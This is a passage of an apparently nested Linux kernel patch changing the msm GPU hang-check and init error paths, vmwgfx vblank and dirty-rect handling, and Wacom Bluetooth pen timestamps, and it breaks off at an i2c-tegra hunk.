+@@ -443,12 +459,12 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ 	ret = msm_init_vram(ddev);
+ 	if (ret)
+-		return ret;
++		goto err_cleanup_mode_config;
+ 
+ 	/* Bind all our sub-components: */
+ 	ret = component_bind_all(dev, ddev);
+ 	if (ret)
+-		return ret;
++		goto err_deinit_vram;
+ 
+ 	dma_set_max_seg_size(dev, UINT_MAX);
+ 
+@@ -543,6 +559,17 @@ static int msm_drm_init(struct device *dev, const struct drm_driver *drv)
+ 
+ err_msm_uninit:
+ 	msm_drm_uninit(dev);
++
++	return ret;
++
++err_deinit_vram:
++	msm_deinit_vram(ddev);
++err_cleanup_mode_config:
++	drm_mode_config_cleanup(ddev);
++	destroy_workqueue(priv->wq);
++err_put_dev:
++	drm_dev_put(ddev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/msm_drv.h b/drivers/gpu/drm/msm/msm_drv.h
+index b2ea262296a4f..d4e0ef608950e 100644
+--- a/drivers/gpu/drm/msm/msm_drv.h
++++ b/drivers/gpu/drm/msm/msm_drv.h
+@@ -224,7 +224,13 @@ struct msm_drm_private {
+ 
+ 	struct drm_atomic_state *pm_state;
+ 
+-	/* For hang detection, in ms */
++	/**
++	 * hangcheck_period: For hang detection, in ms
++	 *
++	 * Note that in practice, a submit/job will get at least two hangcheck
++	 * periods, due to checking for progress being implemented as simply
++	 * "have the CP position registers changed since last time?"
++	 */
+ 	unsigned int hangcheck_period;
+ 
+ 	/**
+diff --git a/drivers/gpu/drm/msm/msm_gpu.c b/drivers/gpu/drm/msm/msm_gpu.c
+index 4f495eecc34ba..3802495003258 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.c
++++ b/drivers/gpu/drm/msm/msm_gpu.c
+@@ -494,6 +494,21 @@ static void hangcheck_timer_reset(struct msm_gpu *gpu)
+ 			round_jiffies_up(jiffies + msecs_to_jiffies(priv->hangcheck_period)));
+ }
+ 
++static bool made_progress(struct msm_gpu *gpu, struct msm_ringbuffer *ring)
++{
++	if (ring->hangcheck_progress_retries >= DRM_MSM_HANGCHECK_PROGRESS_RETRIES)
++		return false;
++
++	if (!gpu->funcs->progress)
++		return false;
++
++	if (!gpu->funcs->progress(gpu, ring))
++		return false;
++
++	ring->hangcheck_progress_retries++;
++	return true;
++}
++
+ static void hangcheck_handler(struct timer_list *t)
+ {
+ 	struct msm_gpu *gpu = from_timer(gpu, t, hangcheck_timer);
+@@ -504,9 +519,12 @@ static void hangcheck_handler(struct timer_list *t)
+ 	if (fence != ring->hangcheck_fence) {
+ 		/* some progress has been made.. ya! */
+ 		ring->hangcheck_fence = fence;
+-	} else if (fence_before(fence, ring->fctx->last_fence)) {
++		ring->hangcheck_progress_retries = 0;
++	} else if (fence_before(fence, ring->fctx->last_fence) &&
++			!made_progress(gpu, ring)) {
+ 		/* no progress and not done.. hung! */
+ 		ring->hangcheck_fence = fence;
++		ring->hangcheck_progress_retries = 0;
+ 		DRM_DEV_ERROR(dev->dev, "%s: hangcheck detected gpu lockup rb %d!\n",
+ 				gpu->name, ring->id);
+ 		DRM_DEV_ERROR(dev->dev, "%s:     completed fence: %u\n",
+@@ -832,6 +850,7 @@ int msm_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ 		struct msm_gpu *gpu, const struct msm_gpu_funcs *funcs,
+ 		const char *name, struct msm_gpu_config *config)
+ {
++	struct msm_drm_private *priv = drm->dev_private;
+ 	int i, ret, nr_rings = config->nr_rings;
+ 	void *memptrs;
+ 	uint64_t memptrs_iova;
+@@ -859,6 +878,16 @@ int msm_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ 	kthread_init_work(&gpu->recover_work, recover_worker);
+ 	kthread_init_work(&gpu->fault_work, fault_worker);
+ 
++	priv->hangcheck_period = DRM_MSM_HANGCHECK_DEFAULT_PERIOD;
++
++	/*
++	 * If progress detection is supported, halve the hangcheck timer
++	 * duration, as it takes two iterations of the hangcheck handler
++	 * to detect a hang.
++	 */
++	if (funcs->progress)
++		priv->hangcheck_period /= 2;
++
+ 	timer_setup(&gpu->hangcheck_timer, hangcheck_handler, 0);
+ 
+ 	spin_lock_init(&gpu->perf_lock);
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index a89bfdc3d7f90..732295e256834 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -78,6 +78,15 @@ struct msm_gpu_funcs {
+ 	struct msm_gem_address_space *(*create_private_address_space)
+ 		(struct msm_gpu *gpu);
+ 	uint32_t (*get_rptr)(struct msm_gpu *gpu, struct msm_ringbuffer *ring);
++
++	/**
++	 * progress: Has the GPU made progress?
++	 *
++	 * Return true if GPU position in cmdstream has advanced (or changed)
++	 * since the last call.  To avoid false negatives, this should account
++	 * for cmdstream that is buffered in this FIFO upstream of the CP fw.
++	 */
++	bool (*progress)(struct msm_gpu *gpu, struct msm_ringbuffer *ring);
+ };
+ 
+ /* Additional state for iommu faults: */
+@@ -237,6 +246,7 @@ struct msm_gpu {
+ #define DRM_MSM_INACTIVE_PERIOD   66 /* in ms (roughly four frames) */
+ 
+ #define DRM_MSM_HANGCHECK_DEFAULT_PERIOD 500 /* in ms */
++#define DRM_MSM_HANGCHECK_PROGRESS_RETRIES 3
+ 	struct timer_list hangcheck_timer;
+ 
+ 	/* Fault info for most recent iova fault: */
+@@ -548,7 +558,7 @@ static inline void gpu_rmw(struct msm_gpu *gpu, u32 reg, u32 mask, u32 or)
+ 	msm_rmw(gpu->mmio + (reg << 2), mask, or);
+ }
+ 
+-static inline u64 gpu_read64(struct msm_gpu *gpu, u32 lo, u32 hi)
++static inline u64 gpu_read64(struct msm_gpu *gpu, u32 reg)
+ {
+ 	u64 val;
+ 
+@@ -566,17 +576,17 @@ static inline u64 gpu_read64(struct msm_gpu *gpu, u32 lo, u32 hi)
+ 	 * when the lo is read, so make sure to read the lo first to trigger
+ 	 * that
+ 	 */
+-	val = (u64) msm_readl(gpu->mmio + (lo << 2));
+-	val |= ((u64) msm_readl(gpu->mmio + (hi << 2)) << 32);
++	val = (u64) msm_readl(gpu->mmio + (reg << 2));
++	val |= ((u64) msm_readl(gpu->mmio + ((reg + 1) << 2)) << 32);
+ 
+ 	return val;
+ }
+ 
+-static inline void gpu_write64(struct msm_gpu *gpu, u32 lo, u32 hi, u64 val)
++static inline void gpu_write64(struct msm_gpu *gpu, u32 reg, u64 val)
+ {
+ 	/* Why not a writeq here? Read the screed above */
+-	msm_writel(lower_32_bits(val), gpu->mmio + (lo << 2));
+-	msm_writel(upper_32_bits(val), gpu->mmio + (hi << 2));
++	msm_writel(lower_32_bits(val), gpu->mmio + (reg << 2));
++	msm_writel(upper_32_bits(val), gpu->mmio + ((reg + 1) << 2));
+ }
+ 
+ int msm_gpu_pm_suspend(struct msm_gpu *gpu);
+diff --git a/drivers/gpu/drm/msm/msm_ringbuffer.h b/drivers/gpu/drm/msm/msm_ringbuffer.h
+index 2a5045abe46e8..698b333abccd6 100644
+--- a/drivers/gpu/drm/msm/msm_ringbuffer.h
++++ b/drivers/gpu/drm/msm/msm_ringbuffer.h
+@@ -35,6 +35,11 @@ struct msm_rbmemptrs {
+ 	volatile u64 ttbr0;
+ };
+ 
++struct msm_cp_state {
++	uint64_t ib1_base, ib2_base;
++	uint32_t ib1_rem, ib2_rem;
++};
++
+ struct msm_ringbuffer {
+ 	struct msm_gpu *gpu;
+ 	int id;
+@@ -64,6 +69,29 @@ struct msm_ringbuffer {
+ 	uint64_t memptrs_iova;
+ 	struct msm_fence_context *fctx;
+ 
++	/**
++	 * hangcheck_progress_retries:
++	 *
++	 * The number of extra hangcheck duration cycles that we have given
++	 * due to it appearing that the GPU is making forward progress.
++	 *
++	 * For GPU generations which support progress detection (see.
++	 * msm_gpu_funcs::progress()), if the GPU appears to be making progress
++	 * (ie. the CP has advanced in the command stream, we'll allow up to
++	 * DRM_MSM_HANGCHECK_PROGRESS_RETRIES expirations of the hangcheck timer
++	 * before killing the job.  But to detect progress we need two sample
++	 * points, so the duration of the hangcheck timer is halved.  In other
++	 * words we'll let the submit run for up to:
++	 *
++	 * (DRM_MSM_HANGCHECK_DEFAULT_PERIOD / 2) * (DRM_MSM_HANGCHECK_PROGRESS_RETRIES + 1)
++	 */
++	int hangcheck_progress_retries;
++
++	/**
++	 * last_cp_state: The state of the CP at the last call to gpu->progress()
++	 */
++	struct msm_cp_state last_cp_state;
++
+ 	/*
+ 	 * preempt_lock protects preemption and serializes wptr updates against
+ 	 * preemption.  Can be aquired from irq context.
+diff --git a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+index b4729a94c34a8..898b892f11439 100644
+--- a/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
++++ b/drivers/gpu/drm/panel/panel-orisetech-otm8009a.c
+@@ -471,7 +471,7 @@ static int otm8009a_probe(struct mipi_dsi_device *dsi)
+ 		       DRM_MODE_CONNECTOR_DSI);
+ 
+ 	ctx->bl_dev = devm_backlight_device_register(dev, dev_name(dev),
+-						     dsi->host->dev, ctx,
++						     dev, ctx,
+ 						     &otm8009a_backlight_ops,
+ 						     NULL);
+ 	if (IS_ERR(ctx->bl_dev)) {
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+index 0bc1ebc43002b..1ec9c53a7bf43 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_drv.h
+@@ -1221,9 +1221,6 @@ int vmw_kms_write_svga(struct vmw_private *vmw_priv,
+ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+ 				uint32_t pitch,
+ 				uint32_t height);
+-u32 vmw_get_vblank_counter(struct drm_crtc *crtc);
+-int vmw_enable_vblank(struct drm_crtc *crtc);
+-void vmw_disable_vblank(struct drm_crtc *crtc);
+ int vmw_kms_present(struct vmw_private *dev_priv,
+ 		    struct drm_file *file_priv,
+ 		    struct vmw_framebuffer *vfb,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+index 13721bcf047c0..aab6389cb4aab 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.c
+@@ -31,7 +31,6 @@
+ #include <drm/drm_fourcc.h>
+ #include <drm/drm_rect.h>
+ #include <drm/drm_sysfs.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -832,15 +831,6 @@ void vmw_du_crtc_atomic_begin(struct drm_crtc *crtc,
+ void vmw_du_crtc_atomic_flush(struct drm_crtc *crtc,
+ 			      struct drm_atomic_state *state)
+ {
+-	struct drm_pending_vblank_event *event = crtc->state->event;
+-
+-	if (event) {
+-		crtc->state->event = NULL;
+-
+-		spin_lock_irq(&crtc->dev->event_lock);
+-		drm_crtc_send_vblank_event(crtc, event);
+-		spin_unlock_irq(&crtc->dev->event_lock);
+-	}
+ }
+ 
+ 
+@@ -1274,70 +1264,10 @@ static void vmw_framebuffer_bo_destroy(struct drm_framebuffer *framebuffer)
+ 	kfree(vfbd);
+ }
+ 
+-static int vmw_framebuffer_bo_dirty(struct drm_framebuffer *framebuffer,
+-				    struct drm_file *file_priv,
+-				    unsigned int flags, unsigned int color,
+-				    struct drm_clip_rect *clips,
+-				    unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-	struct vmw_framebuffer_bo *vfbd =
+-		vmw_framebuffer_to_vfbd(framebuffer);
+-	struct drm_clip_rect norect;
+-	int ret, increment = 1;
+-
+-	drm_modeset_lock_all(&dev_priv->drm);
+-
+-	if (!num_clips) {
+-		num_clips = 1;
+-		clips = &norect;
+-		norect.x1 = norect.y1 = 0;
+-		norect.x2 = framebuffer->width;
+-		norect.y2 = framebuffer->height;
+-	} else if (flags & DRM_MODE_FB_DIRTY_ANNOTATE_COPY) {
+-		num_clips /= 2;
+-		increment = 2;
+-	}
+-
+-	switch (dev_priv->active_display_unit) {
+-	case vmw_du_legacy:
+-		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, &vfbd->base, 0, 0,
+-					      clips, num_clips, increment);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-		WARN_ONCE(true, "Dirty called with invalid display system.\n");
+-		break;
+-	}
+-
+-	vmw_cmd_flush(dev_priv, false);
+-
+-	drm_modeset_unlock_all(&dev_priv->drm);
+-
+-	return ret;
+-}
+-
+-static int vmw_framebuffer_bo_dirty_ext(struct drm_framebuffer *framebuffer,
+-					struct drm_file *file_priv,
+-					unsigned int flags, unsigned int color,
+-					struct drm_clip_rect *clips,
+-					unsigned int num_clips)
+-{
+-	struct vmw_private *dev_priv = vmw_priv(framebuffer->dev);
+-
+-	if (dev_priv->active_display_unit == vmw_du_legacy &&
+-	    vmw_cmd_supported(dev_priv))
+-		return vmw_framebuffer_bo_dirty(framebuffer, file_priv, flags,
+-						color, clips, num_clips);
+-
+-	return drm_atomic_helper_dirtyfb(framebuffer, file_priv, flags, color,
+-					 clips, num_clips);
+-}
+-
+ static const struct drm_framebuffer_funcs vmw_framebuffer_bo_funcs = {
+ 	.create_handle = vmw_framebuffer_bo_create_handle,
+ 	.destroy = vmw_framebuffer_bo_destroy,
+-	.dirty = vmw_framebuffer_bo_dirty_ext,
++	.dirty = drm_atomic_helper_dirtyfb,
+ };
+ 
+ /*
+@@ -2158,30 +2088,6 @@ bool vmw_kms_validate_mode_vram(struct vmw_private *dev_priv,
+ 		 dev_priv->max_primary_mem : dev_priv->vram_size);
+ }
+ 
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-u32 vmw_get_vblank_counter(struct drm_crtc *crtc)
+-{
+-	return 0;
+-}
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-int vmw_enable_vblank(struct drm_crtc *crtc)
+-{
+-	return -EINVAL;
+-}
+-
+-/*
+- * Function called by DRM code called with vbl_lock held.
+- */
+-void vmw_disable_vblank(struct drm_crtc *crtc)
+-{
+-}
+-
+ /**
+  * vmw_du_update_layout - Update the display unit with topology from resolution
+  * plugin and generate DRM uevent
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+index 85f86faa32439..b02d2793659f9 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_kms.h
+@@ -517,11 +517,6 @@ void vmw_du_connector_destroy_state(struct drm_connector *connector,
+  */
+ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv);
+ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv);
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment);
+ int vmw_kms_update_proxy(struct vmw_resource *res,
+ 			 const struct drm_clip_rect *clips,
+ 			 unsigned num_clips,
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+index b8761f16dd785..ac72c20715f32 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_ldu.c
+@@ -28,7 +28,6 @@
+ #include <drm/drm_atomic.h>
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -235,9 +234,7 @@ static const struct drm_crtc_funcs vmw_legacy_crtc_funcs = {
+ 	.atomic_duplicate_state = vmw_du_crtc_duplicate_state,
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
++	.page_flip = drm_atomic_helper_page_flip,
+ };
+ 
+ 
+@@ -277,6 +274,12 @@ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
+ };
+ 
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips);
++
+ /*
+  * Legacy Display Plane Functions
+  */
+@@ -295,7 +298,6 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_framebuffer *fb;
+ 	struct drm_crtc *crtc = new_state->crtc ?: old_state->crtc;
+ 
+-
+ 	ldu = vmw_crtc_to_ldu(crtc);
+ 	dev_priv = vmw_priv(plane->dev);
+ 	fb       = new_state->fb;
+@@ -308,8 +310,31 @@ vmw_ldu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		vmw_ldu_del_active(dev_priv, ldu);
+ 
+ 	vmw_ldu_commit_list(dev_priv);
+-}
+ 
++	if (vfb && vmw_cmd_supported(dev_priv)) {
++		struct drm_mode_rect fb_rect = {
++			.x1 = 0,
++			.y1 = 0,
++			.x2 = vfb->base.width,
++			.y2 = vfb->base.height
++		};
++		struct drm_mode_rect *damage_rects = drm_plane_get_damage_clips(new_state);
++		u32 rect_count = drm_plane_get_damage_clips_count(new_state);
++		int ret;
++
++		if (!damage_rects) {
++			damage_rects = &fb_rect;
++			rect_count = 1;
++		}
++
++		ret = vmw_kms_ldu_do_bo_dirty(dev_priv, vfb, 0, 0, damage_rects, rect_count);
++
++		drm_WARN_ONCE(plane->dev, ret,
++			"vmw_kms_ldu_do_bo_dirty failed with: ret=%d\n", ret);
++
++		vmw_cmd_flush(dev_priv, false);
++	}
++}
+ 
+ static const struct drm_plane_funcs vmw_ldu_plane_funcs = {
+ 	.update_plane = drm_atomic_helper_update_plane,
+@@ -507,10 +532,6 @@ int vmw_kms_ldu_init_display(struct vmw_private *dev_priv)
+ 	dev_priv->ldu_priv->last_num_active = 0;
+ 	dev_priv->ldu_priv->fb = NULL;
+ 
+-	ret = drm_vblank_init(dev, num_display_units);
+-	if (ret != 0)
+-		goto err_free;
+-
+ 	vmw_kms_create_implicit_placement_property(dev_priv);
+ 
+ 	for (i = 0; i < num_display_units; ++i) {
+@@ -544,11 +565,11 @@ int vmw_kms_ldu_close_display(struct vmw_private *dev_priv)
+ }
+ 
+ 
+-int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+-			    struct vmw_framebuffer *framebuffer,
+-			    unsigned int flags, unsigned int color,
+-			    struct drm_clip_rect *clips,
+-			    unsigned int num_clips, int increment)
++static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
++				   struct vmw_framebuffer *framebuffer,
++				   unsigned int flags, unsigned int color,
++				   struct drm_mode_rect *clips,
++				   unsigned int num_clips)
+ {
+ 	size_t fifo_size;
+ 	int i;
+@@ -564,7 +585,7 @@ int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+ 		return -ENOMEM;
+ 
+ 	memset(cmd, 0, fifo_size);
+-	for (i = 0; i < num_clips; i++, clips += increment) {
++	for (i = 0; i < num_clips; i++, clips++) {
+ 		cmd[i].header = SVGA_CMD_UPDATE;
+ 		cmd[i].body.x = clips->x1;
+ 		cmd[i].body.y = clips->y1;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+index 9c79873f62f06..e1f36a09c59c1 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+@@ -29,7 +29,6 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_damage_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ 
+@@ -320,9 +319,6 @@ static const struct drm_crtc_funcs vmw_screen_object_crtc_funcs = {
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
+ };
+ 
+ /*
+@@ -730,7 +726,6 @@ vmw_sou_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct drm_plane_state *old_state = drm_atomic_get_old_plane_state(state, plane);
+ 	struct drm_plane_state *new_state = drm_atomic_get_new_plane_state(state, plane);
+ 	struct drm_crtc *crtc = new_state->crtc;
+-	struct drm_pending_vblank_event *event = NULL;
+ 	struct vmw_fence_obj *fence = NULL;
+ 	int ret;
+ 
+@@ -754,24 +749,6 @@ vmw_sou_primary_plane_atomic_update(struct drm_plane *plane,
+ 		return;
+ 	}
+ 
+-	/* For error case vblank event is send from vmw_du_crtc_atomic_flush */
+-	event = crtc->state->event;
+-	if (event && fence) {
+-		struct drm_file *file_priv = event->base.file_priv;
+-
+-		ret = vmw_event_fence_action_queue(file_priv,
+-						   fence,
+-						   &event->base,
+-						   &event->event.vbl.tv_sec,
+-						   &event->event.vbl.tv_usec,
+-						   true);
+-
+-		if (unlikely(ret != 0))
+-			DRM_ERROR("Failed to queue event on fence.\n");
+-		else
+-			crtc->state->event = NULL;
+-	}
+-
+ 	if (fence)
+ 		vmw_fence_obj_unreference(&fence);
+ }
+@@ -947,7 +924,7 @@ err_free:
+ int vmw_kms_sou_init_display(struct vmw_private *dev_priv)
+ {
+ 	struct drm_device *dev = &dev_priv->drm;
+-	int i, ret;
++	int i;
+ 
+ 	/* Screen objects won't work if GMR's aren't available */
+ 	if (!dev_priv->has_gmr)
+@@ -957,12 +934,6 @@ int vmw_kms_sou_init_display(struct vmw_private *dev_priv)
+ 		return -ENOSYS;
+ 	}
+ 
+-	ret = -ENOMEM;
+-
+-	ret = drm_vblank_init(dev, VMWGFX_NUM_DISPLAY_UNITS);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+ 	for (i = 0; i < VMWGFX_NUM_DISPLAY_UNITS; ++i)
+ 		vmw_sou_init(dev_priv, i);
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 8650c3aea8f0a..0090abe892548 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -29,7 +29,6 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_damage_helper.h>
+ #include <drm/drm_fourcc.h>
+-#include <drm/drm_vblank.h>
+ 
+ #include "vmwgfx_kms.h"
+ #include "vmw_surface_cache.h"
+@@ -925,9 +924,6 @@ static const struct drm_crtc_funcs vmw_stdu_crtc_funcs = {
+ 	.atomic_destroy_state = vmw_du_crtc_destroy_state,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+-	.get_vblank_counter = vmw_get_vblank_counter,
+-	.enable_vblank = vmw_enable_vblank,
+-	.disable_vblank = vmw_disable_vblank,
+ };
+ 
+ 
+@@ -1591,7 +1587,6 @@ vmw_stdu_primary_plane_atomic_update(struct drm_plane *plane,
+ 	struct vmw_plane_state *vps = vmw_plane_state_to_vps(new_state);
+ 	struct drm_crtc *crtc = new_state->crtc;
+ 	struct vmw_screen_target_display_unit *stdu;
+-	struct drm_pending_vblank_event *event;
+ 	struct vmw_fence_obj *fence = NULL;
+ 	struct vmw_private *dev_priv;
+ 	int ret;
+@@ -1640,23 +1635,6 @@ vmw_stdu_primary_plane_atomic_update(struct drm_plane *plane,
+ 		return;
+ 	}
+ 
+-	/* In case of error, vblank event is send in vmw_du_crtc_atomic_flush */
+-	event = crtc->state->event;
+-	if (event && fence) {
+-		struct drm_file *file_priv = event->base.file_priv;
+-
+-		ret = vmw_event_fence_action_queue(file_priv,
+-						   fence,
+-						   &event->base,
+-						   &event->event.vbl.tv_sec,
+-						   &event->event.vbl.tv_usec,
+-						   true);
+-		if (ret)
+-			DRM_ERROR("Failed to queue event on fence.\n");
+-		else
+-			crtc->state->event = NULL;
+-	}
+-
+ 	if (fence)
+ 		vmw_fence_obj_unreference(&fence);
+ }
+@@ -1883,10 +1861,6 @@ int vmw_kms_stdu_init_display(struct vmw_private *dev_priv)
+ 	if (!(dev_priv->capabilities & SVGA_CAP_GBOBJECTS))
+ 		return -ENOSYS;
+ 
+-	ret = drm_vblank_init(dev, VMWGFX_NUM_DISPLAY_UNITS);
+-	if (unlikely(ret != 0))
+-		return ret;
+-
+ 	dev_priv->active_display_unit = vmw_du_screen_target;
+ 
+ 	for (i = 0; i < VMWGFX_NUM_DISPLAY_UNITS; ++i) {
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 9312d611db8e5..0c6a82c665c1d 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1308,6 +1308,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 	struct input_dev *pen_input = wacom->pen_input;
+ 	unsigned char *data = wacom->data;
++	int number_of_valid_frames = 0;
++	int time_interval = 15000000;
++	ktime_t time_packet_received = ktime_get();
+ 	int i;
+ 
+ 	if (wacom->features.type == INTUOSP2_BT ||
+@@ -1328,12 +1331,30 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 		wacom->id[0] |= (wacom->serial[0] >> 32) & 0xFFFFF;
+ 	}
+ 
++	/* number of valid frames */
+ 	for (i = 0; i < pen_frames; i++) {
+ 		unsigned char *frame = &data[i*pen_frame_len + 1];
+ 		bool valid = frame[0] & 0x80;
++
++		if (valid)
++			number_of_valid_frames++;
++	}
++
++	if (number_of_valid_frames) {
++		if (wacom->hid_data.time_delayed)
++			time_interval = ktime_get() - wacom->hid_data.time_delayed;
++		time_interval /= number_of_valid_frames;
++		wacom->hid_data.time_delayed = time_packet_received;
++	}
++
++	for (i = 0; i < number_of_valid_frames; i++) {
++		unsigned char *frame = &data[i*pen_frame_len + 1];
++		bool valid = frame[0] & 0x80;
+ 		bool prox = frame[0] & 0x40;
+ 		bool range = frame[0] & 0x20;
+ 		bool invert = frame[0] & 0x10;
++		int frames_number_reversed = number_of_valid_frames - i - 1;
++		int event_timestamp = time_packet_received - frames_number_reversed * time_interval;
+ 
+ 		if (!valid)
+ 			continue;
+@@ -1346,6 +1367,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 			wacom->tool[0] = 0;
+ 			wacom->id[0] = 0;
+ 			wacom->serial[0] = 0;
++			wacom->hid_data.time_delayed = 0;
+ 			return;
+ 		}
+ 
+@@ -1382,6 +1404,7 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 						 get_unaligned_le16(&frame[11]));
+ 			}
+ 		}
++
+ 		if (wacom->tool[0]) {
+ 			input_report_abs(pen_input, ABS_PRESSURE, get_unaligned_le16(&frame[5]));
+ 			if (wacom->features.type == INTUOSP2_BT ||
+@@ -1405,6 +1428,9 @@ static void wacom_intuos_pro2_bt_pen(struct wacom_wac *wacom)
+ 
+ 		wacom->shared->stylus_in_proximity = prox;
+ 
++		/* add timestamp to unpack the frames */
++		input_set_timestamp(pen_input, event_timestamp);
++
+ 		input_sync(pen_input);
+ 	}
+ }
+@@ -1895,6 +1921,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	int fmax = field->logical_maximum;
+ 	unsigned int equivalent_usage = wacom_equivalent_usage(usage->hid);
+ 	int resolution_code = code;
++	int resolution = hidinput_calc_abs_res(field, resolution_code);
+ 
+ 	if (equivalent_usage == HID_DG_TWIST) {
+ 		resolution_code = ABS_RZ;
+@@ -1915,8 +1942,15 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ 	switch (type) {
+ 	case EV_ABS:
+ 		input_set_abs_params(input, code, fmin, fmax, fuzz, 0);
+-		input_abs_set_res(input, code,
+-				  hidinput_calc_abs_res(field, resolution_code));
++
++		/* older tablet may miss physical usage */
++		if ((code == ABS_X || code == ABS_Y) && !resolution) {
++			resolution = WACOM_INTUOS_RES;
++			hid_warn(input,
++				 "Wacom usage (%d) missing resolution \n",
++				 code);
++		}
++		input_abs_set_res(input, code, resolution);
+ 		break;
+ 	case EV_KEY:
+ 	case EV_MSC:
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 16f221388563d..1a40bb8c5810c 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -324,6 +324,7 @@ struct hid_data {
+ 	int ps_connected;
+ 	bool pad_input_event_flag;
+ 	unsigned short sequence_number;
++	int time_delayed;
+ };
+ 
+ struct wacom_remote_data {
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 3869c258a5296..2bc40f957e509 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -242,9 +242,10 @@ struct tegra_i2c_hw_feature {
+  * @is_dvc: identifies the DVC I2C controller, has a different register layout
